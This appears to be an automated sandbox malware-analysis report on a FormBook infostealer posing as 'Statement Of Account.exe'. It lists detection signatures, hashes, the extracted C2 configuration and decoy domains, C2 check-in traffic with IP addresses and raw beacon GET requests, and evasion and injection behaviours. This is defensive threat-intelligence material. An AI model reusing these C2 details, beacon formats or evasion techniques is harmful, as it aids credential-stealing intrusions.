Windows Analysis Report
Statement Of Account.exe

Overview

General Information

Sample name: Statement Of Account.exe
Analysis ID: 1430501
MD5: da68e8ff4e0c0d00c613fa9301cf4a37
SHA1: 7456cf2540dce6403407b532c502ce5abb07e9ec
SHA256: b7def3af905789a4ecedcc226d91592d8bc758ce8c5458d62ef435707de8670f
Tags: exe

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Snort IDS alert for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
.NET source code contains very large array initializations
.NET source code contains very large strings
Adds a directory exclusion to Windows Defender
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: CMSTP Execution Process Creation
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect virtualization through RDTSC time measurements
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses a Windows Living Off The Land Binaries (LOL bins)
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

AV Detection

Source: 0000000F.00000002.2937327062.00000000027B0000.00000040.80000000.00040000.00000000.sdmp Malware Configuration Extractor: FormBook {"C2 list": ["www.lolabeautystudios.com/gs12/"], "decoy": ["juniavilela.com", "italiahealth.club", "freefoodpro.com", "qqmotor.co", "mosahacatering.com", "wocc.club", "tourly360.com", "airzf.com", "eternalknot1008.com", "pons.cc", "zdryueva.com", "bodution.website", "vip8g100013.top", "3box.club", "bestoffersinoneplace.com", "tronbank.club", "hlysh.live", "allfireofferapp.sbs", "goldenvistaservices.com", "theconfidencebl-youprint.com", "doping.digital", "urxetqt.com", "utahdatecoach.com", "coworkingvalencia.pro", "thebeautybarandco.com", "umastyle.club", "demandstudiosnews.com", "k2securityhn.com", "teacakesandtadpoles.com", "epacksystems.network", "y2llvq.vip", "udin88b.us", "simonettipressurewashing.com", "baansbliss.com", "messyplayclub.com", "panaco.co", "kustomequipment.com", "actnowgreen.com", "tallawahyouthfoundation.com", "novistashop.com", "oversight418354.email", "ypsom.info", "enerableoffi.club", "otirugkyt.com", "mappedbyamanda.com", "vibelola.com", "nexelab.com", "zgcple.info", "maiores-veritatis.com", "wonderdread.cloud", "signomo.com", "uspsdirect.shop", "finessebuilding.com", "heavydutywearpart.com", "51win.ink", "b-a-s-e.net", "xianqianjin.fun", "domscott.art", "rtp-tambakslot5000.site", "sports565.com", "kpi-finder.com", "taylor.capital", "1993520.xyz", "hjgd.xyz"]}
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe ReversingLabs: Detection: 23%
Source: Statement Of Account.exe ReversingLabs: Detection: 23%
Source: Yara match File source: 14.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000F.00000002.2937327062.00000000027B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.2938280316.0000000004640000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1704225673.0000000004129000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.1776996971.0000000002C40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1704225673.0000000004969000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.1742872490.00000000047D8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.1770021139.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.2938172951.0000000004610000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe Joe Sandbox ML: detected
Source: Statement Of Account.exe Joe Sandbox ML: detected
Source: Statement Of Account.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: Statement Of Account.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: colorcpl.pdbGCTL source: RegSvcs.exe, 00000008.00000002.1773088883.0000000000AE7000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.1776322578.0000000002BF0000.00000040.10000000.00040000.00000000.sdmp, colorcpl.exe, 00000010.00000002.1776739813.0000000000860000.00000040.80000000.00040000.00000000.sdmp
Source: Binary string: cmstp.pdbGCTL source: RegSvcs.exe, 0000000E.00000002.1776807275.0000000001830000.00000040.10000000.00040000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.1770468836.0000000001028000.00000004.00000020.00020000.00000000.sdmp, cmstp.exe, 0000000F.00000002.2937098293.00000000000D0000.00000040.80000000.00040000.00000000.sdmp
Source: Binary string: colorcpl.pdb source: RegSvcs.exe, 00000008.00000002.1773088883.0000000000AE7000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.1776322578.0000000002BF0000.00000040.10000000.00040000.00000000.sdmp, colorcpl.exe, 00000010.00000002.1776739813.0000000000860000.00000040.80000000.00040000.00000000.sdmp
Source: Binary string: RegSvcs.pdb, source: explorer.exe, 00000009.00000002.2955594862.0000000010C3F000.00000004.80000000.00040000.00000000.sdmp, cmstp.exe, 0000000F.00000002.2937707694.0000000002C6C000.00000004.00000020.00020000.00000000.sdmp, cmstp.exe, 0000000F.00000002.2940096728.0000000004EBF000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP source: RegSvcs.exe, 0000000E.00000002.1772711295.0000000001480000.00000040.00001000.00020000.00000000.sdmp, cmstp.exe, 0000000F.00000003.1770419529.0000000004618000.00000004.00000020.00020000.00000000.sdmp, cmstp.exe, 0000000F.00000002.2938861388.0000000004970000.00000040.00001000.00020000.00000000.sdmp, cmstp.exe, 0000000F.00000002.2938861388.0000000004B0E000.00000040.00001000.00020000.00000000.sdmp, cmstp.exe, 0000000F.00000003.1773733976.00000000047C1000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000010.00000003.1774876929.000000000499D000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000010.00000002.1778056834.0000000004B50000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 00000010.00000003.1772583517.00000000047EF000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000010.00000002.1778056834.0000000004CEE000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: RegSvcs.exe, RegSvcs.exe, 0000000E.00000002.1772711295.0000000001480000.00000040.00001000.00020000.00000000.sdmp, cmstp.exe, 0000000F.00000003.1770419529.0000000004618000.00000004.00000020.00020000.00000000.sdmp, cmstp.exe, 0000000F.00000002.2938861388.0000000004970000.00000040.00001000.00020000.00000000.sdmp, cmstp.exe, 0000000F.00000002.2938861388.0000000004B0E000.00000040.00001000.00020000.00000000.sdmp, cmstp.exe, 0000000F.00000003.1773733976.00000000047C1000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000010.00000003.1774876929.000000000499D000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000010.00000002.1778056834.0000000004B50000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 00000010.00000003.1772583517.00000000047EF000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000010.00000002.1778056834.0000000004CEE000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: cmstp.pdb source: RegSvcs.exe, 0000000E.00000002.1776807275.0000000001830000.00000040.10000000.00040000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.1770468836.0000000001028000.00000004.00000020.00020000.00000000.sdmp, cmstp.exe, 0000000F.00000002.2937098293.00000000000D0000.00000040.80000000.00040000.00000000.sdmp
Source: Binary string: IuBP.pdb source: Statement Of Account.exe, SdYCcXyq.exe.0.dr
Source: Binary string: IuBP.pdbSHA256 source: Statement Of Account.exe, SdYCcXyq.exe.0.dr
Source: Binary string: RegSvcs.pdb source: explorer.exe, 00000009.00000002.2955594862.0000000010C3F000.00000004.80000000.00040000.00000000.sdmp, cmstp.exe, 0000000F.00000002.2937707694.0000000002C6C000.00000004.00000020.00020000.00000000.sdmp, cmstp.exe, 0000000F.00000002.2940096728.0000000004EBF000.00000004.10000000.00040000.00000000.sdmp
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then pop esi 14_2_00417322
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then pop edi 14_2_00416CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then pop edi 14_2_00417D70

Networking

Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49748 -> 154.12.38.29:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49750 -> 91.195.240.94:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49751 -> 34.149.87.45:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49752 -> 160.124.174.163:80
Source: C:\Windows\explorer.exe Network Connect: 91.195.240.94 80
Source: C:\Windows\explorer.exe Network Connect: 154.12.38.29 80
Source: C:\Windows\explorer.exe Network Connect: 34.149.87.45 80
Source: Malware configuration extractor URLs: www.lolabeautystudios.com/gs12/
Source: global traffic HTTP traffic detected: GET /gs12/?r6-=DR9+51rACou4eQBXOdoZ4W0ewB14phJf97sbOZAiDLbqJph64OQ6FfPwpwURv63eY6pg&YN=9rKtZn5 HTTP/1.1Host: www.airzf.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /gs12/?r6-=QIIWKxrtyX7LT6NTTkxUIHQxUymhf5FB+GXjykqQ4dPV8mdQoaOANT6/8pJ3wvHey5SR&YN=9rKtZn5 HTTP/1.1Host: www.b-a-s-e.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /gs12/?r6-=993VfXh0jqtko3ENU03aV9e2gnwjzkI9tuLx/ah8zkvGCI6r8A517lqbkaAk6P8eMjr8&YN=9rKtZn5 HTTP/1.1Host: www.zdryueva.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: Joe Sandbox View IP Address: 91.195.240.94
Source: Joe Sandbox View IP Address: 34.149.87.45
Source: Joe Sandbox View ASN Name: SEDO-ASDE
Source: Joe Sandbox View ASN Name: UNMETEREDCA
Source: Joe Sandbox View ASN Name: ATGS-MMD-ASUS
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Windows\explorer.exe Code function: 9_2_0F904F82 getaddrinfo,setsockopt,recv, 9_2_0F904F82
Source: unknown DNS traffic detected: queries for: www.airzf.com
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8X-Wix-Request-Id: 1713890667.07612762899732525067Age: 0Server: PepyakaX-Content-Type-Options: nosniffAccept-Ranges: bytesDate: Tue, 23 Apr 2024 16:44:27 GMTX-Served-By: cache-chi-kigq8000037-CHIX-Cache: MISSVary: Accept-EncodingServer-Timing: cache;desc=miss, varnish;desc=miss_miss, dc;desc=fastly_42_gX-Seen-By: yvSunuo/8ld62ehjr5B7kA==,VtqAe8Wu9wvSsl49B/X4+ewfbs+7qUVAqsIx00yI78k=,m0j2EEknGIVUW/liY8BLLkqHFWhjPEXyPTSLtPMFnp4a0sM5c8dDUFHeNaFq0qDu,2d58ifebGbosy5xc+FRalmBQ2QY4hzEJNVep8btjXtN21kVvhi4WWi737JqnyfsKzRUqbJQEwoR5t7fXMpcLTA==,2UNV7KOq4oGjA5+PKsX47P9efI/myzj/9e1V5kpi0zpYgeUJqUXtid+86vZww+nL,9DY27ey9PtG1M7AzVTPSAeIGguIVY9cIsA/DsRO7DrY=,g2aKszYfRloBamvU9+FSKbaI/koc3kS7zllmkFk7bZc=,0gGrL7iazMoiuqlb7dEO3Xp6cxvAmf0V9RlaNBeq9FVSB88D0lWBQzqUldF0H79KCJgk4i4ryDgNOsmaMtz63A==Transfer-Encoding: chunkedVia: 1.1 googleglb-x-seen-by: bS8wRlGzu0Hc+WrYuHB8QIg44yfcdCMJRkBoQ1h6Vjc=Connection: close
Source: explorer.exe, 00000009.00000000.1714988461.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1721919184.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2946201505.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2942465733.00000000079FB000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: explorer.exe, 00000009.00000000.1714988461.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1721919184.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2946201505.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2942465733.00000000079FB000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: explorer.exe, 00000009.00000000.1714988461.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1721919184.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2946201505.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2942465733.00000000079FB000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: explorer.exe, 00000009.00000000.1714988461.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1721919184.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2946201505.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2942465733.00000000079FB000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0
Source: explorer.exe, 00000009.00000000.1714988461.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2942465733.00000000078AD000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
Source: explorer.exe, 00000009.00000000.1723152883.00000000098A8000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://schemas.mi
Source: explorer.exe, 00000009.00000002.2947771554.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1723152883.00000000098A8000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://schemas.micr
Source: explorer.exe, 00000009.00000002.2945097297.0000000008720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000009.00000002.2948147154.0000000009B60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000009.00000000.1719884903.0000000007F40000.00000002.00000001.00040000.00000000.sdmp String found in binary or memory: http://schemas.micro
Source: Statement Of Account.exe, 00000000.00000002.1703144585.0000000003150000.00000004.00000800.00020000.00000000.sdmp, SdYCcXyq.exe, 0000000B.00000002.1741610690.0000000002CBA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.airzf.com
Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.airzf.com/gs12/
Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.airzf.com/gs12/www.b-a-s-e.net
Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.airzf.comReferer:
Source: Statement Of Account.exe, 00000000.00000002.1713238980.0000000007182000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.b-a-s-e.net
Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.b-a-s-e.net/gs12/
Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.b-a-s-e.net/gs12/www.zdryueva.com
Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.b-a-s-e.netReferer:
Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.baansbliss.com
Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.baansbliss.com/gs12/
Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.baansbliss.com/gs12/www.otirugkyt.com
Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.baansbliss.comReferer:
Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.bodution.website
Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.bodution.website/gs12/
Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.bodution.website/gs12/www.juniavilela.com
Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.bodution.websiteReferer:
Source: Statement Of Account.exe, 00000000.00000002.1713238980.0000000007182000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.demandstudiosnews.com
Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.demandstudiosnews.com/gs12/
Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.demandstudiosnews.com/gs12/www.heavydutywearpart.com
Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.demandstudiosnews.comReferer:
Source: Statement Of Account.exe, 00000000.00000002.1713238980.0000000007182000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com
Source: Statement Of Account.exe, 00000000.00000002.1713238980.0000000007182000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers
Source: Statement Of Account.exe, 00000000.00000002.1713238980.0000000007182000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/?
Source: Statement Of Account.exe, 00000000.00000002.1713238980.0000000007182000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: Statement Of Account.exe, 00000000.00000002.1713238980.0000000007182000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: Statement Of Account.exe, 00000000.00000002.1713238980.0000000007182000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers8
Source: Statement Of Account.exe, 00000000.00000002.1713238980.0000000007182000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers?
Source: Statement Of Account.exe, 00000000.00000002.1713238980.0000000007182000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designersG
Source: Statement Of Account.exe, 00000000.00000002.1713238980.0000000007182000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fonts.com
Source: Statement Of Account.exe, 00000000.00000002.1713238980.0000000007182000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cn
Source: Statement Of Account.exe, 00000000.00000002.1713238980.0000000007182000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: Statement Of Account.exe, 00000000.00000002.1713238980.0000000007182000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: Statement Of Account.exe, 00000000.00000002.1713238980.0000000007182000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: Statement Of Account.exe, 00000000.00000002.1713238980.0000000007182000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.goldenvistaservices.com
Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.goldenvistaservices.com/gs12/
Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.goldenvistaservices.comReferer:
Source: Statement Of Account.exe, 00000000.00000002.1713238980.0000000007182000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.heavydutywearpart.com
Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.heavydutywearpart.com/gs12/
Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.heavydutywearpart.com/gs12/www.goldenvistaservices.com
Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.heavydutywearpart.comReferer:
Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.hjgd.xyz
Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.hjgd.xyz/gs12/
Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.hjgd.xyz/gs12/www.bodution.website
Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.hjgd.xyzReferer:
Source: Statement Of Account.exe, 00000000.00000002.1713238980.0000000007182000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.juniavilela.com
Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.juniavilela.com/gs12/
Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.juniavilela.com/gs12/www.lolabeautystudios.com
Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.juniavilela.comReferer:
Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.kustomequipment.com
Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.kustomequipment.com/gs12/
Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.kustomequipment.com/gs12/www.novistashop.com
Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.kustomequipment.comReferer:
Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.lolabeautystudios.com
Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.lolabeautystudios.com/gs12/
Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.lolabeautystudios.com/gs12/www.kustomequipment.com
Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.lolabeautystudios.comReferer:
Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.nexelab.com
Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.nexelab.com/gs12/
Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.nexelab.com/gs12/www.udin88b.us
Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.nexelab.comReferer:
Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.novistashop.com
Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.novistashop.com/gs12/
Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.novistashop.com/gs12/www.nexelab.com
Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.novistashop.comReferer:
Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.otirugkyt.com
Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.otirugkyt.com/gs12/
Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.otirugkyt.com/gs12/www.demandstudiosnews.com
Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.otirugkyt.comReferer:
Source: Statement Of Account.exe, 00000000.00000002.1713238980.0000000007182000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.sajatypeworks.com
Source: Statement Of Account.exe, 00000000.00000002.1713238980.0000000007182000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.sakkal.com
Source: Statement Of Account.exe, 00000000.00000002.1713238980.0000000007182000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.sandoll.co.kr
Source: Statement Of Account.exe, 00000000.00000002.1713238980.0000000007182000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.tiro.com
Source: Statement Of Account.exe, 00000000.00000002.1713238980.0000000007182000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.udin88b.us
